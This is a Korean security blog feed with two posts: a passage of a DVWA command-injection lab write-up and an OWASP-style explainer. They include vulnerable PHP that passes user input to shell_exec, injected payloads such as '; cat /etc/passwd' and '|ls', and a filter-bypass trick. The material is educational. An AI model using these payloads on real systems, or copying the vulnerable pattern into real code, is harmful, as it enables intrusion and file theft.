&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;641&quot; data-origin-height=&quot;347&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bk8i1q/btsLQO6I190/uN7CErSOdw9ixR6J5ZiBIk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bk8i1q/btsLQO6I190/uN7CErSOdw9ixR6J5ZiBIk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bk8i1q/btsLQO6I190/uN7CErSOdw9ixR6J5ZiBIk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbk8i1q%2FbtsLQO6I190%2FuN7CErSOdw9ixR6J5ZiBIk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;641&quot; height=&quot;347&quot; data-origin-width=&quot;641&quot; data-origin-height=&quot;347&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `&amp;amp;`은 쉘에서 명령을 백그라운드로 실행하도록 하는 명령어이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ping 명령어는 백그라운드에서 실행되고, 쉘은 다음 명령어를 바로 처리하도록 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그래서, `ls`명령어가 먼저 실행된 다음에 백그라운드로 `ping 127.0.0.1`이 실행된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;  3. High Level&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;637&quot; data-origin-height=&quot;291&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cmiTMJ/btsLP2EBS71/ephlUdO2R7Vaskwzv6QYi0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cmiTMJ/btsLP2EBS71/ephlUdO2R7Vaskwzv6QYi0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cmiTMJ/btsLP2EBS71/ephlUdO2R7Vaskwzv6QYi0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcmiTMJ%2FbtsLP2EBS71%2FephlUdO2R7Vaskwzv6QYi0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;637&quot; height=&quot;291&quot; data-origin-width=&quot;637&quot; data-origin-height=&quot;291&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;역시나 IP를 입력하면, ping결과가 나온다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) `127.0.0.1; ls`, `127.0.0.1| ls`, `127.0.0.1 &amp;amp; ls`&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;627&quot; data-origin-height=&quot;143&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cwi1c3/btsLQh9p8Wl/OYCXDU6vKqomdpePfgaCf1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cwi1c3/btsLQh9p8Wl/OYCXDU6vKqomdpePfgaCf1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cwi1c3/btsLQh9p8Wl/OYCXDU6vKqomdpePfgaCf1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcwi1c3%2FbtsLQh9p8Wl%2FOYCXDU6vKqomdpePfgaCf1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;125&quot; data-origin-width=&quot;627&quot; data-origin-height=&quot;143&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;636&quot; data-origin-height=&quot;149&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mvAVv/btsLP1lryLP/vlrKSPkhYsDR94dfQckl20/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mvAVv/btsLP1lryLP/vlrKSPkhYsDR94dfQckl20/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mvAVv/btsLP1lryLP/vlrKSPkhYsDR94dfQckl20/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmvAVv%2FbtsLP1lryLP%2FvlrKSPkhYsDR94dfQckl20%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;129&quot; data-origin-width=&quot;636&quot; data-origin-height=&quot;149&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;632&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/OZn4z/btsLQS2jDl5/EKiWywzOVoMwPOopZRw001/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/OZn4z/btsLQS2jDl5/EKiWywzOVoMwPOopZRw001/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/OZn4z/btsLQS2jDl5/EKiWywzOVoMwPOopZRw001/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FOZn4z%2FbtsLQS2jDl5%2FEKiWywzOVoMwPOopZRw001%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;131&quot; data-origin-width=&quot;632&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  Low level, Medium level에서 가능했던 명령어가 실행되지 않음을 알 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스 코드 확인&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;769&quot; data-origin-height=&quot;656&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bAEoSI/btsLPwzogH0/KXFEEvfpKgMpZgG3Bwne3K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bAEoSI/btsLPwzogH0/KXFEEvfpKgMpZgG3Bwne3K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bAEoSI/btsLPwzogH0/KXFEEvfpKgMpZgG3Bwne3K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbAEoSI%2FbtsLPwzogH0%2FKXFEEvfpKgMpZgG3Bwne3K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;769&quot; height=&quot;656&quot; data-origin-width=&quot;769&quot; data-origin-height=&quot;656&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;더 많은 특수문자들이 필터링된 것을 알 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;코드를 자세희보면, `| `부분에 띄어쓰기가 된 것을 볼 수 있다. 개발자의 코딩 실수로 문자 blacklist 방식이 우회가 가능하게 된 것이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  띄어쓰기 없이 `|` 뒤에 명령어를 입력하면 필터링되지 않을 것이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) `127.0.0.1|ls` (띄어쓰기 없이)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;549&quot; data-origin-height=&quot;195&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ROwjA/btsLPQqSc5g/2owripeJgnLlrv6J8AcfY1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ROwjA/btsLPQqSc5g/2owripeJgnLlrv6J8AcfY1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ROwjA/btsLPQqSc5g/2owripeJgnLlrv6J8AcfY1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FROwjA%2FbtsLPQqSc5g%2F2owripeJgnLlrv6J8AcfY1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;195&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;549&quot; data-origin-height=&quot;195&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  &lt;b&gt;성공! &lt;b&gt; &lt;/b&gt; &lt;/b&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;  4. Impossible Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;지금까지 시도했던 우회기법들 전부 사용 불가인 것을 알 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;edited_blob&quot; data-origin-width=&quot;550&quot; data-origin-height=&quot;169&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/otfZI/btsLPzXgWke/lGuKfbrhZi7iyi1udhAFg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/otfZI/btsLPzXgWke/lGuKfbrhZi7iyi1udhAFg0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/otfZI/btsLPzXgWke/lGuKfbrhZi7iyi1udhAFg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FotfZI%2FbtsLPzXgWke%2FlGuKfbrhZi7iyi1udhAFg0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;169&quot; data-filename=&quot;edited_blob&quot; data-origin-width=&quot;550&quot; data-origin-height=&quot;169&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;550&quot; data-origin-height=&quot;173&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/I5Gu6/btsLP3cwofm/OrTNCb5Uc6srIP7KRuFLW1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/I5Gu6/btsLP3cwofm/OrTNCb5Uc6srIP7KRuFLW1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/I5Gu6/btsLP3cwofm/OrTNCb5Uc6srIP7KRuFLW1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FI5Gu6%2FbtsLP3cwofm%2FOrTNCb5Uc6srIP7KRuFLW1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;173&quot; data-origin-width=&quot;550&quot; data-origin-height=&quot;173&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;536&quot; data-origin-height=&quot;172&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Eld0r/btsLO0ubdAr/Wm8wDrC9lkl1KKlSCt9Zhk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Eld0r/btsLO0ubdAr/Wm8wDrC9lkl1KKlSCt9Zhk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Eld0r/btsLO0ubdAr/Wm8wDrC9lkl1KKlSCt9Zhk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEld0r%2FbtsLO0ubdAr%2FWm8wDrC9lkl1KKlSCt9Zhk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;176&quot; data-origin-width=&quot;536&quot; data-origin-height=&quot;172&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스 코드 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cxyTmT/btsLQ7rnfKM/nTMZ41WEwgYWHFB5TgrQJ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cxyTmT/btsLQ7rnfKM/nTMZ41WEwgYWHFB5TgrQJ0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cxyTmT/btsLQ7rnfKM/nTMZ41WEwgYWHFB5TgrQJ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcxyTmT%2FbtsLQ7rnfKM%2FnTMZ41WEwgYWHFB5TgrQJ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;423&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  소스 코드를 확인하면, IP 형식만 입력 가능한 것을 알 수 있다. (숫자.숫자.숫자.숫자 형식만 가능)&lt;br /&gt;입력값 검증을 통해서, 필요한 정보만 입력하도록 설정하여 Command Injection 공격을 불가능하도록 만들었다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안/DVWA 실습</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/659</guid>
      <comments>https://jennana.tistory.com/659#entry659comment</comments>
      <pubDate>Thu, 16 Jan 2025 23:30:31 +0900</pubDate>
    </item>
    <item>
      <title>[웹 해킹] Command Injection</title>
      <link>https://jennana.tistory.com/658</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;[웹&amp;nbsp;해킹]&amp;nbsp;Command&amp;nbsp;Injection&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;1. 개요&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Command Injection은 애플리케이션이 시스템 명령어를 실행하기 위해 사용자의 입력을 포함할 때, 공격자가 입력을 조작하여 추가 명령어를 삽입하거나 실행하도록 만드는 방식&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  공격 조건 :&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 애플리케이션이 운영체제 명령어를 호출해야 하는 경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 입력값에 대한 검증이 충분하지 않은 경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;551&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/epHIBP/btsLN3RxXbP/C2wdpvMXJNVQsFaCqWnuMK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/epHIBP/btsLN3RxXbP/C2wdpvMXJNVQsFaCqWnuMK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/epHIBP/btsLN3RxXbP/C2wdpvMXJNVQsFaCqWnuMK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FepHIBP%2FbtsLN3RxXbP%2FC2wdpvMXJNVQsFaCqWnuMK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2000&quot; height=&quot;551&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;551&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Command Injection 공격은 2021 OWASP Top 10에서 `Injection`에 해당된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2. 공격 예시&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  예시1&lt;/p&gt;
&lt;pre id=&quot;code_1736940256593&quot; class=&quot;php&quot; data-ke-language=&quot;php&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&amp;lt;?php
if (isset($_GET['ip'])) {
    $ip = $_GET['ip'];
    $output = shell_exec(&quot;ping -c 4 &quot; . $ip);
    echo &quot;&amp;lt;pre&amp;gt;$output&amp;lt;/pre&amp;gt;&quot;;
}
?&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위와 같이 `ping` 명령어에 사용자 입력($ip)을 포함하여서 실행되는데, 공격자가 입력값을 조작하여 추가 명령어를 수행할 수 있음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Unix/Linux일 때 예시 : `8.8.8.8; cat /etc/passwd`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;윈도일 때 예시 : `8.8.8.8 &amp;amp;&amp;amp; dir`&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  예시2&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;웹 애플리케이션에서 파일 이름이 URL에 표시되는 경우가 많다. Perl은 프로세스에서 열린 문장으로 데이터를 파이프로 연결할 수 있다. 파일 이름 끝에 파이프 기호 `|`를 추가하면 된다.
&lt;p data-ke-size=&quot;size16&quot;&gt;[예시]&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;`https://sensitive/cgi-bin/userData.pl?doc=user1.txt`&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;  `https://sensitive/cgi-bin/userData.pl?doc=/bin/ls|`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이렇게 URL을 수정하면, `/bin/ls` 명령어가 실행된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  예시3&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;.php 페이지의 URL 끝에 세미콜론 (`;`)을 추가한 다음에 운영체제 명령어를 입력하면 명령이 실행된다. `%3B`는 URL 인코딩이 되어 있어 세미콜론(`;`)으로 디코딩된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;[예시]&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;`https://sensitive/something.php?dir=%3Bcat%20/etc/passwd`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;(URL 디코딩) `https://sensitive/something.php?dir=;cat /etc/passwd`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  예시4&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;인터넷에서 탐색할 수 있는 문서 집합을 포함하는 애플리케이션의 예로, `Burp Suite`와 같은 프록시툴로 실행하면 다음과 같은 POST HTTP를 얻을 수 있다.&lt;/p&gt;
&lt;pre id=&quot;code_1736943197212&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;POST /public/doc HTTP/1.1
Host: www.example.com
[...]
Referer: https://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이제 POST HTTP에 주입할 운영 체제 명령을 추가할 수 있는지 테스트할 수 있습니다.&lt;/p&gt;
&lt;div style=&quot;color: #252525; text-align: start;&quot;&gt;
&lt;pre id=&quot;code_1736943232348&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;POST /public/doc HTTP/1.1
Host: www.example.com
[...]
Referer: https://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf+|+Dir c:\&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;div style=&quot;color: #252525; text-align: start;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  문서 경로에 `|`을 추가하여 `Dir c:\`라는 시스템 명령어 실행&lt;/p&gt;
&lt;div style=&quot;color: #252525; text-align: start;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;애플리케이션이 요청을 검증하지 않으면 다음과 같은 결과를 얻을 수 있음.&lt;/p&gt;
&lt;pre id=&quot;code_1736943252196&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;    Exec Results for 'cmd.exe /c type &quot;C:\httpd\public\doc\&quot;Doc=Doc1.pdf+|+Dir c:\'
    Output...
    Il volume nell'unit&amp;agrave; C non ha etichetta.
    Numero di serie Del volume: 8E3F-4B61
    Directory of c:\
     18/10/2006 00:27 2,675 Dir_Prog.txt
     18/10/2006 00:28 3,887 Dir_ProgFile.txt
     16/11/2006 10:43
        Doc
        11/11/2006 17:25
           Documents and Settings
           25/10/2006 03:11
              I386
              14/11/2006 18:51
             h4ck3r
             30/09/2005 21:40 25,934
            OWASP1.JPG
            03/11/2006 18:29
                Prog
                18/11/2006 11:20
                    Program Files
                    16/11/2006 21:12
                        Software
                        24/10/2006 18:25
                            Setup
                            24/10/2006 23:37
                                Technologies
                                18/11/2006 11:14
                                3 File 32,496 byte
                                13 Directory 6,921,269,248 byte disponibili
                                Return code: 0&lt;/code&gt;&lt;/pre&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3. 취약한 함수&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Command Injection에 사용할 수 있는 특수문자 : `| ; &amp;amp; $ &amp;gt; &amp;lt; ' !`&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc; text-align: start;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;`cmd1|cmd2`&lt;span&gt;&amp;nbsp;&lt;/span&gt;: (파이프) `|`를 사용하면 cmd1의 출력을 cmd2의 입력으로 전달합니다. cmd1이 성공하거나 실패하더라도 cmd2는 실행됩니다.&lt;/li&gt;
&lt;li&gt;`cmd1;cmd2`&lt;span&gt;&amp;nbsp;&lt;/span&gt;: (순차실행) `;`를 사용하면 &lt;span&gt;&amp;nbsp;&lt;/span&gt;cmd1의 실행이 끝난 후, 성공여부와 상관없이 cmd2가 실행됩니다.&lt;/li&gt;
